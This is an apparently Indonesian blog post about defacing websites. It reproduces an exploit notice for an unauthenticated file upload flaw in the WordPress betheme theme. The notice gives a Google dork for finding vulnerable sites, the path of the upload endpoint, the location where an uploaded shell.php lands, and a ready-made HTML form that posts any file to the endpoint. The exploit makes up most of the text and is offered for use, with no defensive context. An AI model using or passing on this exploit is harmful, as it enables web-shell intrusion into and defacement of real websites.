Deface dengan Wordpress Themes betheme Sh3ll Upload

28 Mar, 2017

#################################################################################
# Wordpress Themes betheme Sh3ll Upload Vulnerability | CSRF
# Author : Turk@Xtra
# Google Dork: inurl:/wp-content/themes/betheme/
# Date:2017-03-13
# Tested on: Win 7, Linux
#################################################################################

# [!] Exploit : http://127.0.0.1/wp-content/themes/betheme/muffin-options/fields/upload/field_upload.php

# [!] File Location : http://127.0.0.1//wp-content/themes/betheme/muffin-options/fields/upload/Files/shell.php

#################################################################################
#[*] CSRF:
#################################################################################
<html>
<body>
<form enctype="multipart/form-data" action="127.0.0.1/wp-content/themes/betheme/muffin-options/fields/upload/field_upload.php" method="post">
Your File: <input name="files[]" type="file" /><br />
<input type="submit" value="SIKAT!" />
</form>
</body>
</html>
#################################################################################
# Thanks to : ~~> Blackwolf ||Ormazd ||Khatar ||mohammad Pn ||Criminal ||Rabinson.

MNH-BLOG

Widget HTML Atas

Deface dengan Wordpress Themes betheme Sh3ll Upload